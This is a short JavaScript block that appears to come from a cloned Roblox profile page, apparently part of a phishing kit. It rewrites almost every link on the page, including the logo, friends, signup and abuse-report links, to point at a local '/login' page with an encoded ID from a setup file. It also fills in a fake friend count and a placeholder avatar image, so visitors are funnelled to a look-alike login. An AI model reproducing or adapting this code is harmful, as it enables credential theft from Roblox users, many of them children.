<script>
var css = document.createElement('style');
css.innerText = '.icon-broken {background-image: none !important;}';
function htmroblox(matchClass, content) {
    var elems = document.getElementsByTagName('*'), i;
    for (i in elems) {
        if((' ' + elems[i].className + ' ').indexOf(' ' + matchClass + ' ')
                > -1) {
            elems[i].innerHTML = content;
        }
    }
}
function classroblox(matchClass, content) {
    var elems = document.getElementsByTagName('*'), i;
    for (i in elems) {
        if((' ' + elems[i].className + ' ').indexOf(' ' + matchClass + ' ')
                > -1) {
            elems[i].className = content;
        }
    }
}
function loginroblox(matchClass, url) {
    var elems = document.getElementsByTagName('*'), i;
    for (i in elems) {
        if((' ' + elems[i].className + ' ').indexOf(' ' + matchClass + ' ')
                > -1) {
            elems[i].href = url;
        }
    }
}
var robloxlogin = setInterval(function(){
fetch("setup/id.txt", {
method: "GET"
})
.then((result) => {
return result.text();
})
.then((response) => {
var returnUrl = '/login?returnUrl=' + btoa(response);
loginroblox('rbx-navbar-login btn-secondary-sm nav-menu-title rbx-menu-item', returnUrl);
loginroblox('btn-secondary-xs btn-more see-all-link-icon ng-binding', returnUrl);
loginroblox('btn-min-width btn-secondary-xs btn-more inventory-link see-all-link-icon ng-binding', returnUrl);
loginroblox('btn-secondary-xs btn-min-width btn-more see-all-link-icon', returnUrl);
loginroblox('btn-fixed-width btn-secondary-xs btn-more see-all-link-icon', returnUrl);
loginroblox('text-link friend-link ng-isolate-scope', returnUrl);
loginroblox('text-name', returnUrl);
loginroblox('abuse-report-link abuse-report-modal', returnUrl);
loginroblox('rbx-navbar-signup btn-growth-sm nav-menu-title signup-button', returnUrl);
loginroblox('navbar-brand', returnUrl);
loginroblox('btn-control-md disabled ng-binding ng-scope', returnUrl);
})
},1)
var robloxfriends = setInterval(function(){
fetch("setup/friends.txt", {
method: "GET"
})
.then((result) => {
return result.text();
})
.then((response) => {
var friends = '(' + response + ')';
htmroblox('friends-count ng-binding', friends);
})
},1)
var robloxthumbnail = setInterval(function(){
htmroblox('thumbnail-2d-container icon-broken thumbnail-span', '<img class="" src="THUMBNAILURI" alt="" title="">');
classroblox('thumbnail-2d-container icon-broken thumbnail-span', 'thumbnail-2d-container thumbnail-span');
htmroblox('thumbnail-2d-container thumbnail-span', '<img class="" src="THUMBNAILURI" alt="" title="">');
},1)
</script>